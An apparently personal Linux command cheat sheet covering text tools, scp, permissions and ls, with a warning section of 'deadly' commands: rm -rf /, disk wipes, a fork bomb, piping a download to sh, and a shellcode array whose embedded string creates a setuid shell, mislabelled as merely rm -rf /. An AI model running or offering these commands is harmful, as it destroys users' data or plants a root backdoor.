$ ps auwx | head -n 15 Show the first 15 lines of ps output

This can also be done using this obsolete (but shorter) syntax:

$ head -50 myfile.txt
$ ps auwx | head -15

You can use the tail command in a similar way to view the end of a file:

$ tail -n 15 myfile.txt Display the last 15 lines in a file
$ tail -15 myfile.txt Display the last 15 lines in a file
$ ps auwx | tail -n 15 Display the last 15 lines of ps output

The tail command can also be used to continuously watch the end of a file as the file is written to by another program. This is very useful for reading live log files when troubleshooting apache, sendmail, or many other system services:

# tail -f /var/log/messages Watch system messages live
# tail -f /var/log/maillog Watch mail server messages live
# tail -f /var/log/httpd/access_log Watch web server messages live

Paging Through Text

When you have a large chunk of text and need to get to more than just its beginning or end, you need a tool to page through the text. The original Unix system pager was the more command:

$ ps auwx | more Page through the output of ps (press spacebar)
$ more myfile.txt Page through the contents of a file

However, more has some limitations. For example, in the line with ps above, more could not scroll up. The less command was created as a more powerful and user-friendly more. The common saying when less was introduced was: "What is less? less is more!" We recommend you no longer use more, and use less instead.

	Note 	

The less command has another benefit worth noting. Unlike text editors such as vi, it does not read the entire file when it starts. This results in faster start-up times when viewing large files. The less command can be used with the same syntax as more in the examples above:

$ ps auwx | less Page through the output of ps
$ cat myfile.txt | less Page through the contents of a file
$ less myfile.txt Page through a text file

The less command enables you to navigate using the up and down arrow keys, PageUp, PageDown, and the spacebar. If you are using less on a file (not standard input), press v to open the current file in an editor. Which editor gets launched is determined by environment variables defined for your account. The editor is taken from the environment variable VISUAL, if defined, or EDITOR if VISUAL is not defined. If neither is defined, less invokes the JOE editor on Ubuntu.

	Note 	

Other versions of Linux invoke vi as the default editor in this case. Press Ctrl+c to interrupt that mode. As in vi, while viewing a file with less, you can search for a string by pressing / (forward slash) followed by the string and Enter. To search for further occurrences, press / and Enter repeatedly. To scroll forward and back while using less, use the F and B keys, respectively. For example, 10f scrolls forward 10 lines and 15b scrolls back 15 lines. Type d to scroll down half a screen and u to scroll up half a screen.

Searching for Text with grep

The grep command comes in handy when you need to perform more advanced string searches in a file. In fact, the phrase to grep has actually entered the computer jargon as a verb, just as to Google has entered the popular language. Here are examples of the grep command:

$ grep francois myfile.txt Show lines containing francois
# grep 404 /var/log/httpd/access_log Show lines containing 404
$ ps auwx | grep init Show init lines from ps output
$ ps auwx | grep "\[*\]" Show bracketed commands
$ dmesg | grep "[ ]ata\|^ata" Show ata kernel device information

These command lines have some particular uses, beyond being examples of the grep command. By searching access_log for 404 you can see requests to your web server for pages that were not found (these could be someone fishing to exploit your system, or a web page you moved or forgot to create). Displaying bracketed commands that are output from the ps command is a way to see commands for which ps cannot display options. The last command checks the kernel buffer ring for any ATA device information, such as hard disks and CD-ROM drives.

The grep command can also recursively search a few or a whole lot of files at the same time. The following command recursively searches files in the /etc/httpd/conf and /etc/httpd/conf.d directories for the string VirtualHost:

$ grep -R VirtualHost /etc/httpd/conf*

Note that your system may not have any files with names starting with conf in the /etc/httpd directory, depending on what you have installed on your system. You can apply this technique to other files as well.

Add line numbers (-n) to your grep command to find the exact lines where the search terms occur:

$ grep -Rn VirtualHost /etc/httpd/conf*

To colorize the searched term in the search results, add the --color option:

$ grep --color -Rn VirtualHost /etc/httpd/conf*

By default, in a multifile search, the file name is displayed for each search result. Use the -h option to disable the display of file names. This example searches for the string sshd in the file auth.log:

$ grep -h sshd /var/log/auth.log

If you want to ignore case when you search messages, use the -i option:

$ grep -i selinux /var/log/messages Search file for selinux (any case)

To display only the name of the file that includes the search term, add the -l option:

$ grep -Rl VirtualHost /etc/httpd/conf*

To display all lines that do not match the string, add the -v option:

$ grep -v "200 "/var/log/httpd/access_log* Show lines without "200 "
	Note 	

When piping the output of ps into grep, here's a trick to prevent the grep process from appearing in the grep results:

# ps auwx | grep "[i]nit"

Replacing Text with Sed

Finding text within a file is sometimes the first step towards replacing text. Editing streams of text is done using the sed command. The sed command is actually a full-blown scripting language. For the examples in this chapter, we cover basic text replacement with the sed command. If you are familiar with text replacement commands in vi, sed has some similarities. In the following example, you would replace only the first occurrence per line of francois with chris. Here, sed takes its input from a pipe, while sending its output to stdout (your screen):

$ cat myfile.txt | sed s/francois/chris/

Adding a g to the end of the substitution line, as in the following command, causes every occurrence of francois to be changed to chris. Also, in the following example, input is directed from the file myfile.txt and output is directed to mynewfile.txt:

$ sed s/francois/chris/g < myfile.txt > mynewfile.txt

The next example replaces the first occurrences of of the text /home/bob to /home2/bob from the /etc/passwd file. (Note that this command does not change that file, but outputs the changed text.) This is useful for the case when user accounts are migrated to a new directory (presumably on a new disk), named with much deliberation, home2. Here, we have to use quotes and backslashes to escape the forward slashes so they are not interpreted as delimiters:

$ sed 's/\/home\/bob/\/home2\/bob/g' < /etc/passwd

Although the forward slash is the sed command's default delimiter, you can change the delimiter to any other character of your choice. Changing the delimiter can make your life easier when the string contains slashes. For example, the previous command line that contains a path could be replaced with either of the following commands:

$ sed 's-/home/bob/-/home2/bob/-' < /etc/passwd
$ sed 'sD/home/bob/D/home2/bob/D' < /etc/passwd

In the first line shown, a dash (-) is used as the delimiter. In the second case, the letter D is the delimiter.

The sed command can run multiple substitutions at once, by preceding each one with -e. Here, in the text streaming from myfile.txt, all occurrences of francois are changed to FRANCOIS and occurrences of chris are changed to CHRIS:

$ sed -e s/francois/FRANCOIS/g -e s/chris/CHRIS/g < myfile.txt

You can use sed to add newline characters to a stream of text. Where Enter appears, press the Enter key. The > on the second line is generated by bash, not typed in.

$ echo aaabccc | sed 's/b/\Enter
> /'
aaa
ccc

The trick just shown does not work on the left side of the sed substitution command. When you need to substitute newline characters, it's easier to use the tr command.

Translating or Removing Characters with tr

The tr command is an easy way to do simple character translations on the fly. In the following example, new lines are replaced with spaces, so all the files listed from the current directory are output on one line:

$ ls | tr '\n' ' ' Replace newline characters with spaces

The tr command can be used to replace one character with another, but does not work with strings like sed does. The following command replaces all instances of the lowercase letter f with a capital F.

$ tr f F < myfile.txt Replace every f in the file with F

You can also use the tr command to simply delete characters. Here are two examples:

$ ls | tr -d '\n' Delete new lines (resulting in one line)
$ tr -d f < myfile.txt Delete every letter f from the file

The tr command can do some nifty tricks when you specify ranges of characters to work on. Here's an example of capitalizing lowercase letters to uppercase letters:

$ echo chris | tr a-z A-Z Translate chris into CHRIS
CHRIS

The same result can be obtained with the following syntax:

$ echo chris | tr '[:lower:]' '[:upper:]' Translate chris into CHRIS

Checking Differences Between Two Files with diff When you have two versions of a file, it can be useful to know the differences between the two files. For example, when upgrading a software package, you may save your old configuration file under a new file name, such as config.old or config.bak, so you preserve your configuration. When that occurs, you can use the diff command to discover which lines differ between your configuration and the new configuration, in order to merge the two. For example:

$ diff config config.old

You can change the output of diff to what is known as unified format. Unified format can be easier to read by human beings. It adds three lines of context before and after each block of changed lines that it reports, and then uses + and - to show the difference between the files. The following set of commands creates a file (f1.txt) containing a sequence of numbers (1-7), creates a file (f2.txt) with one of those numbers changed (using sed), and compares the two files using the diff command:

$ seq 1 7 > f1.txt Send a sequence of numbers to f1.txt
$ cat f1.txt Display contents of f1.txt

1 2 3 4 5 6 7

$ sed s/4/FOUR/ < f1.txt > f2.txt Change 4 to FOUR and send to f2.txt
$ diff f1.txt f2.txt

4c4 Shows line 4 was changed in file < 4 --- > FOUR $ diff -u f1.txt f2.txt Display unified output of diff --- f1.txt 2007-09-07 18:26:06.000000000 -0500 +++ f2.txt 2007-09-07 18:26:39.000000000 -0500 @@ -1,7 +1,7 @@ 1 2 3 -4 +FOUR 5 6 7 The diff -u output just displayed adds information such as modification dates and times to the regular diff output. The sdiff command can be used to give you yet another view. The sdiff command can merge the output of two files interactively, as shown in the following output:

$ sdiff f1.txt f2.txt

1 1 2 2 3 3 4 | FOUR 5 5 6 6 7 7 Another variation on the diff theme is vimdiff, which opens the two files side by side in Vim and outlines the differences in color. Similarly, gvimdiff opens the two files in gVim.

	Note 	

You need to install the vim-gnome package to run the gvim or gvimdiff program. The output of diff -u can be fed into the patch command. The patch command takes an old file and a diff file as input and outputs a patched file. Following on the example above, we use the diff command between the two files to generate a patch and then apply the patch to the first file:

$ diff -u f1.txt f2.txt > patchfile.txt
$ patch f1.txt < patchfile.txt

patching file f1.txt $ cat f1.txt 1 2 3 FOUR 5 6 7 That is how many OSS developers (including kernel developers) distribute their code patches. The patch and diff commands can also be run on entire directory trees. However, that usage is outside the scope of this book.

Using awk and cut to Process Columns

Another massive text processing tool is the awk command. The awk command is a full-blown programming language. Although there is much more you can do with the awk command, the following examples show you a few tricks related to extracting columns of text:

$ ps auwx | awk '{print $1,$11}' Show columns 1, 11 of ps
$ ps auwx | awk '/francois/ {print $11}' Show francois' processes
$ ps auwx | grep francois | awk '{print $11}' Same as above

The first example displays the contents of the first column (user name) and eleventh column (command name) from currently running processes output from the ps command (ps auwx). The next two commands produce the same output, with one using the awk command and the other using the grep command to find all processes owned by the user named francois. In each case, when processes owned by francois are found, column 11 (command name) is displayed for each of those processes.

By default, the awk command assumes the delimiter between columns is spaces. You can specify a different delimiter with the -F option as follows:

$ awk -F: '{print $1,$5}' /etc/passwd Use colon delimiter to print cols

You can get similar results with the cut command. As with the previous awk example, we specify a colon (:) as the column delimiter to process information from the /etc/ passwd file:

$ cut -d: -f1,5 /etc/passwd Use colon delimiter to print cols

The cut command can also be used with ranges of fields. The following command prints columns 1 thru 5 of the /etc/passwd file:

$ cut -d: -f1-5 /etc/passwd Show columns 1 through 5

Instead of using a dash (-) to indicate a range of numbers, you can use it to print all columns from a particular column number and above. The following command displays all columns from column 5 and above from the /etc/passwd file:

$ cut -d: -f5- /etc/passwd Show columns 5 and later

We prefer to use the awk command when columns are separated by a varying number of spaces, such as the output of the ps command. And we prefer the cut command when dealing with files delimited by commas (,) or colons (:), such as the /etc/ password file.

Converting Text Files to Different Formats

Text files in the Unix world use a different end-of-line character (\n) than those used in the DOS/Windows world (\r\n). You can view these special characters in a text file with the od command:

$ od -c -t x1 myfile.txt

So they will appear properly when copied from one environment to the other, it is necessary to convert the files. Here are some examples:

$ unix2dos < myunixfile.txt > mydosfile.txt
$ cat mydosfile.txt | dos2unix > myunixfile.txt

The unix2dos example just shown above converts a Linux or Unix plain text file (myunixfile.txt) to a DOS or Windows text file (mydosfile.txt). The dos2unix example does the opposite by converting a DOS/Windows file to a Linux/Unix file. These commands require you to install the tofrodos package.

7 Deadly Linux Commands

The 7 Deadly Linux Commands

If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

  • This command will recursively and forcefully delete all the files inside the root directory.
rm -rf /


  • This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
  • This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.
mkfs.ext3 /dev/sda
  • Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
:(){:|:&};:
  • With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.
any_command > /dev/sda
  • Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.
wget http://some_untrusted_source -O- | sh


  • This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
mv /home/yourhomedirectory/* /dev/null

Copy Files Using SCP

copy from a remote machine to my machine:

you have to be in the local machine terminal to run below

scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt 

copy from my machine to a remote machine:

scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt 

copy all file*.txt from a remote machine to my machine (file01.txt, file02.txt, etc.; note the quotation marks:

scp "user@192.168.1.100:/home/remote_user/Desktop/file*.txt" /home/me/Desktop/file.txt 

copy a directory from a remote machine to my machine:

scp -r user@192.168.1.100:/home/remote_user /Desktop/files /home/me/Desktop/

Local to remote

scp -r directory root@domain.com:/var/www/

Copy Files and directories when you are cd into that directory

scp -r * root@domain.com:/var/www/

see 'man scp' or 'man sftp' for more ..

SCP with Key

scp -i ~/.ssh/id_rsa.pub FILENAME USER@SERVER:/home/USER/FILENAME

My Frequently used Linux Commands

command to Show all users:

cat /etc/passwd 
lastlog

List all installed Apache Modules

apache2ctl -M

Update server

sudo apt-get update
sudo apt-get dist-upgrade

Move files and folders

mv *.*  -wil move all files and not folders
mv * -will move all files and folders

Updating Ubuntu

sudo aptitude update
sudo aptitude safe-upgrade
ssh using different port
ssh -p 113 root@whatever.com

Change Permissions

chmod 777 -R folder

use 755

Read More ... Setting File and Directory Permissions

REstart network in fedora

/etc/init.d/network restart

Change the owner and group

chown bacchas2:psacln -R folder

Create New Directories

$ mkdir /tmp/new          Create "new" directory in /tmp
$ mkdir -p /tmp/a/b/c/new Create parent directories as needed for "new"
$ mkdir -m 700 /tmp/new2  Create new2 with drwx — — — permissions

The first mkdir command simply adds the new directory to the existing /tmp directory. The second example creates directories as needed (subdirectories a, b, and c) to create the resulting new directory. The last command adds the -m option to set directory permissions as well.

rm myfile.txt
rm [-f] [-i] [-R] [-r] [filenames | directory]
  • -f Remove all files (whether write-protected or not) in a directory without prompting the user. In a write-protected directory, however, files are never removed (whatever their permissions are), but no messages are displayed. If the removal of a write-protected directory is attempted, this option will not suppress an error message.
  • -i Interactive. With this option, rm prompts for confirmation before removing any files. It over- rides the -f option and remains in effect even if the standard input is not a terminal.
  • -R Same as -r option.
  • -r Recursively remove directories and subdirectories in the argument list. The directory will be emptied of files and removed. The user is normally prompted for removal of any write-protected files which the directory contains. The write-protected files are removed without prompting, however, if the -f option is used, or if the standard input is not a terminal and the -i option is not used. Symbolic links that are encountered with this option will not be traversed. If the removal of a non-empty, write-protected directory is attempted, the utility will always fail (even if the -f option is used), resulting in an error message.
  • filenames A path of a filename to be removed.

Examples

rm myfile.txt

Remove the file myfile.txt without prompting the user.

rm -r directory

Remove a directory, even if files existed in that directory.

Listing Files

Although you are probably quite familiar with the ls command, you may not be familiar with many of the useful options for ls that can help you find out a lot about the files on your system. Here are some examples of using ls to display long lists (-l) of files and directories:

  • $ ls -l Files and directories in current directory
  • $ ls -la Includes files/directories beginning with dot (.)
  • $ ls -lt Orders files by time recently changed
  • $ ls -lu Orders files by time recently accessed
  • $ ls -lS Orders files by size
  • $ ls -li Lists the inode associated with each file
  • $ ls -ln List numeric user/group IDs, instead of names
  • $ ls -lh List file sizes in human-readable form (K, M, etc.)
  • $ ls -lR List files recursively, from current directory and subdirectories

When you list files, there are also ways to have different types of files appear differently in the listing:

$ ls -F                Add a character to indicate file type

myfile-symlink@ config/ memo.txt pipefile| script.sh* xpid.socket=

$ ls --color=always    Show file types as different colors
$ ls -C                Show files listing in columns

In the -F example, the output shows several different file types. The myfile-symlink@ indicates a symbolic link to a directory, config/ is a regular directory, memo.txt is a regular file (no extra characters), pipefile| is a named pipe (created with mkfifo), script.sh* is an executable file, and xpid.socket= is a socket. The next two examples display different file types in different colors and lists output in columns, respectively.


Back To Top- Home - Category